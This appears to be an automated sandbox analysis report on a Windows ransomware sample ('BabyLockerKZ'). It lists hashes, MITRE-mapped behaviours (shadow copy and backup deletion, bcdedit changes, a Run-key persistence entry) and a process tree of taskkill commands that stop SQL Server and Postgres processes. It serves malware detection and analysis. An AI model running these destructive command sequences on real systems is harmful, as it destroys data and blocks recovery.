f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c

Analysis

max time kernel
164s
max time network
129s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
27-02-2024 18:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
Size

419KB
MD5

17073229079e31a3190e7a8509302b22
SHA1

6ed12dade62a8e420c5b5b295ddd6c4ce83b9549
SHA256

f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c
SHA512

7afe620f907740393f021fcd337aaf5ed8b5e903aab3ed592d8695a1d877e41094bbc9aca20e8062c11acf2e288bd96033ffa08544d926be5493be26cb79c647
SSDEEP

6144:4CmPvkrISw8ZMQsFMFEXmtT+n4CQi2oD9HoZwIYaTR/dXszI2lUC4c:L3W6MoFlV+n4CQRoD9IygT/L

Score

10^/10

evasion persistence ransomware

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2912 created 1396	2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	8

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
2296	bcdedit.exe
2024	bcdedit.exe

Renames multiple (210) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Deletes System State backups 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command and Scripting Interpreter

T1059

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
1592	wbadmin.exe

Deletes system backups 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command and Scripting Interpreter

T1059

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
1196	wbadmin.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe\""	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe\""	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe

Enumerates connected drives 3 TTPs 26 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\U:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\V:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\I:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\X:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\F:	cipher.exe
File opened (read-only)	\??\K:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\Q:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\T:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\W:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\S:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\A:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\B:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\E:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\J:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\M:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\R:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\F:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\G:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\L:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\N:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\P:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\Z:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\A:	cipher.exe
File opened (read-only)	\??\H:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\O:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\Y:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl	wbadmin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
2620	vssadmin.exe

Kills process with taskkill 14 IoCs

evasion

pid	Process
2524	taskkill.exe
580	taskkill.exe
2032	taskkill.exe
2420	taskkill.exe
1992	taskkill.exe
1192	taskkill.exe
1356	taskkill.exe
552	taskkill.exe
2660	taskkill.exe
2728	taskkill.exe
2376	taskkill.exe
540	taskkill.exe
3008	taskkill.exe
1728	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe

Suspicious use of AdjustPrivilegeToken 35 IoCs

description	pid	Process
Token: SeDebugPrivilege	2524	taskkill.exe
Token: SeDebugPrivilege	2660	taskkill.exe
Token: SeDebugPrivilege	580	taskkill.exe
Token: SeDebugPrivilege	2728	taskkill.exe
Token: SeDebugPrivilege	1992	taskkill.exe
Token: SeDebugPrivilege	2376	taskkill.exe
Token: SeDebugPrivilege	1192	taskkill.exe
Token: SeDebugPrivilege	1356	taskkill.exe
Token: SeDebugPrivilege	3008	taskkill.exe
Token: SeDebugPrivilege	1728	taskkill.exe
Token: SeDebugPrivilege	540	taskkill.exe
Token: SeDebugPrivilege	2032	taskkill.exe
Token: SeIncreaseQuotaPrivilege	2648	WMIC.exe
Token: SeSecurityPrivilege	2648	WMIC.exe
Token: SeTakeOwnershipPrivilege	2648	WMIC.exe
Token: SeLoadDriverPrivilege	2648	WMIC.exe
Token: SeSystemProfilePrivilege	2648	WMIC.exe
Token: SeSystemtimePrivilege	2648	WMIC.exe
Token: SeProfSingleProcessPrivilege	2648	WMIC.exe
Token: SeIncBasePriorityPrivilege	2648	WMIC.exe
Token: SeCreatePagefilePrivilege	2648	WMIC.exe
Token: SeBackupPrivilege	2648	WMIC.exe
Token: SeRestorePrivilege	2648	WMIC.exe
Token: SeShutdownPrivilege	2648	WMIC.exe
Token: SeDebugPrivilege	2648	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2648	WMIC.exe
Token: SeRemoteShutdownPrivilege	2648	WMIC.exe
Token: SeUndockPrivilege	2648	WMIC.exe
Token: SeManageVolumePrivilege	2648	WMIC.exe
Token: 33	2648	WMIC.exe
Token: 34	2648	WMIC.exe
Token: 35	2648	WMIC.exe
Token: SeBackupPrivilege	2704	vssvc.exe
Token: SeRestorePrivilege	2704	vssvc.exe
Token: SeAuditPrivilege	2704	vssvc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2912 wrote to memory of 2508	2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	28
PID 2912 wrote to memory of 2508	2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	28
PID 2912 wrote to memory of 2508	2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	28
PID 2912 wrote to memory of 2508	2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	28
PID 2508 wrote to memory of 2648	2508	cmd.exe	30
PID 2508 wrote to memory of 2648	2508	cmd.exe	30
PID 2508 wrote to memory of 2648	2508	cmd.exe	30
PID 2508 wrote to memory of 2648	2508	cmd.exe	30
PID 2912 wrote to memory of 2504	2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	31
PID 2912 wrote to memory of 2504	2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	31
PID 2912 wrote to memory of 2504	2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	31
PID 2912 wrote to memory of 2504	2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	31
PID 2504 wrote to memory of 2556	2504	cmd.exe	33
PID 2504 wrote to memory of 2556	2504	cmd.exe	33
PID 2504 wrote to memory of 2556	2504	cmd.exe	33
PID 2504 wrote to memory of 2556	2504	cmd.exe	33
PID 2556 wrote to memory of 2524	2556	cmd.exe	34
PID 2556 wrote to memory of 2524	2556	cmd.exe	34
PID 2556 wrote to memory of 2524	2556	cmd.exe	34
PID 2912 wrote to memory of 2424	2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	36
PID 2912 wrote to memory of 2424	2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	36
PID 2912 wrote to memory of 2424	2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	36
PID 2912 wrote to memory of 2424	2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	36
PID 2424 wrote to memory of 2584	2424	cmd.exe	38
PID 2424 wrote to memory of 2584	2424	cmd.exe	38
PID 2424 wrote to memory of 2584	2424	cmd.exe	38
PID 2424 wrote to memory of 2584	2424	cmd.exe	38
PID 2584 wrote to memory of 2420	2584	cmd.exe	39
PID 2584 wrote to memory of 2420	2584	cmd.exe	39
PID 2584 wrote to memory of 2420	2584	cmd.exe	39
PID 2912 wrote to memory of 2476	2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	40
PID 2912 wrote to memory of 2476	2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	40
PID 2912 wrote to memory of 2476	2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	40
PID 2912 wrote to memory of 2476	2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	40
PID 2476 wrote to memory of 2856	2476	cmd.exe	43
PID 2476 wrote to memory of 2856	2476	cmd.exe	43
PID 2476 wrote to memory of 2856	2476	cmd.exe	43
PID 2476 wrote to memory of 2856	2476	cmd.exe	43
PID 2856 wrote to memory of 2660	2856	cmd.exe	42
PID 2856 wrote to memory of 2660	2856	cmd.exe	42
PID 2856 wrote to memory of 2660	2856	cmd.exe	42
PID 2912 wrote to memory of 2384	2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	44
PID 2912 wrote to memory of 2384	2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	44
PID 2912 wrote to memory of 2384	2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	44
PID 2912 wrote to memory of 2384	2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	44
PID 2384 wrote to memory of 1312	2384	cmd.exe	46
PID 2384 wrote to memory of 1312	2384	cmd.exe	46
PID 2384 wrote to memory of 1312	2384	cmd.exe	46
PID 2384 wrote to memory of 1312	2384	cmd.exe	46
PID 1312 wrote to memory of 580	1312	cmd.exe	47
PID 1312 wrote to memory of 580	1312	cmd.exe	47
PID 1312 wrote to memory of 580	1312	cmd.exe	47
PID 2912 wrote to memory of 1568	2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	48
PID 2912 wrote to memory of 1568	2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	48
PID 2912 wrote to memory of 1568	2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	48
PID 2912 wrote to memory of 1568	2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	48
PID 1568 wrote to memory of 2748	1568	cmd.exe	51
PID 1568 wrote to memory of 2748	1568	cmd.exe	51
PID 1568 wrote to memory of 2748	1568	cmd.exe	51
PID 1568 wrote to memory of 2748	1568	cmd.exe	51
PID 2748 wrote to memory of 2728	2748	cmd.exe	52
PID 2748 wrote to memory of 2728	2748	cmd.exe	52
PID 2748 wrote to memory of 2728	2748	cmd.exe	52
PID 2912 wrote to memory of 1672	2912	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	53

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1396
- C:\Users\Admin\AppData\Local\Temp\f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
  "C:\Users\Admin\AppData\Local\Temp\f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Adds Run key to start application
  - Enumerates connected drives
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2912
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2508
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c rem Kill "SQL"
      4⤵
      PID:2648
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2504
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2556
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sqlbrowser.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2524
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2424
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2584
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sql writer.exe
        5⤵
        Kills process with taskkill
        
        PID:2420
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2476
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2856
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2384
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1312
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im msmdsrv.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:580
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1568
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2748
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im MsDtsSrvr.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2728
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
    3⤵
    PID:1672
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
      4⤵
      PID:2000
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sqlceip.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1992
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
    3⤵
    PID:2164
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
      4⤵
      PID:1704
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im fdlauncher.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2376
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
    3⤵
    PID:924
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
      4⤵
      PID:2352
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im Ssms.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1192
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
    3⤵
    PID:1472
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
      4⤵
      PID:1012
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im SQLAGENT.EXE
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1356
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
    3⤵
    PID:1872
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
      4⤵
      PID:2336
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im fdhost.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3008
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
    3⤵
    PID:1612
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
      4⤵
      PID:1516
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im ReportingServicesService.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1728
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
    3⤵
    PID:1388
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
      4⤵
      PID:2260
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im msftesql.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:540
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
    3⤵
    PID:2088
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
      4⤵
      PID:3056
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im pg_ctl.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2032
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe
    3⤵
    PID:2300
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe
      4⤵
      PID:3064
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -impostgres.exe
        5⤵
        Kills process with taskkill
        
        PID:552
- - C:\Windows\SysWOW64\cmd.exe
